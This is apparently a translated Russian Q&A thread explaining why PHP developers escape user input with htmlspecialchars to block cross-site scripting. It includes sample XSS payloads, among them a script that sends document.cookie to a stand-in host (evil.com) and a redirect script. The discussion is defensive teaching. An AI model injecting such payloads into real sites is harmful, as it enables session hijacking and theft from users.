Нужно ли так много убегать?

Если чье-то имя оказалось:

<script>document.write('<img src="http://www.evil.com/worm.php?'+document.cookie+'"/>');</script>

Тогда на вашем сайте может появиться червь. По сути, червь — это всего лишь сценарий, который берет файлы cookie сеанса пользователя, входит в систему, а затем выполняет вредоносные действия, копируя себя по мере того, как его просматривает все больше людей.

Да, это необходимо. См. Википедию для получения информации об уязвимостях межсайтового скриптинга.

PHP нельзя запустить с помощью XSS, но злоумышленник может украсть файл cookie сеанса. Потенциально опасно, если этот файл cookie сеанса предназначен, например, для администратора CMS.

Это не только для безопасности. Например, если вы получите Fred&Jen как $_POST['name'], XML-документ станет недействительным.

Угроза здесь — XSS. Это код Javascript, который злоумышленник попытается выполнить с помощью атаки XSS.

Чтобы убедиться в этом, удалите htmlspecialchars(), а затем опубликуйте это как name:

<script>alert('xss')</script>

Вы увидите, что ваш код PHP распечатает это, и браузер выполнит Javascript. Наиболее распространены XSS-атаки на веб-приложения, в которых пользователь авторизовался. Успешная XSS-атака может прочитать файл cookie идентификатора сеанса жертвы с помощью document.cookie, а затем отправить его на веб-сайт злоумышленников, где злоумышленник может продолжить захват сеанса.

Эта атака известна как Reflective XSS. Более серьезным типом XSS является Persistent XSS, когда вы, например, сохраняете входные данные в базу данных, а затем распечатываете их на своей домашней странице для просмотра всеми пользователями или на любой другой странице. Постоянный XSS гораздо более опасен, потому что любой посетитель страницы, на которой сохраняется XSS, может быть атакован без необходимости повторного запуска атаки для каждой жертвы.

Если вы будете печатать только то, что публикуют эти же пользователи, они не могут причинить большого вреда ни вам, ни другим пользователям. Тем не менее, это полезно, так как пользователь может использовать «>» и «‹», что испортит представление контента.

Однако, если вы собираетесь показывать контент, который присылают другие пользователи, это становится гораздо более опасным.

Пользователь может вставлять что угодно, от ссылок на другие сайты до javascript.

<script>window.location = 'http://www.evilsite.com';</script>

И все пользователи, которые заходят на сайт, на котором отображается этот фрагмент пользовательского контента, будут перенаправлены на сайт evilsite.

Да, кто-то может, например, внедрить некоторый код Javascript, который при отображении, например, перенаправит их на другой сайт (что довольно безвредно).

пример:

<script type="text/javascript">
window.location = "http://www.google.com/"
</script>

Перенаправил бы пользователя в Google, если бы он был опубликован без экранирования

PHP-код нельзя внедрить в это поле, так как он не оценивается интерпретатором PHP, однако он предоставляет потенциал для межсайтового скриптинга.

Вы можете проверить это, используя что-то вроде этого:

<form action="" method="POST">
<input type="text" name="name"/>
<input type="submit"/>
</form>

<?php
if(isset($_POST['name'])){?>
    Hi <?php echo htmlspecialchars($_POST['name']); ?>.
<?php}?>

Затем в поле «имя» отправьте этот код и посмотрите, что произойдет:

<script type="text/javascript">alert("P0WN3D");</script>

Может ли кто-нибудь вставить вредоносный код в одну строку?
Да.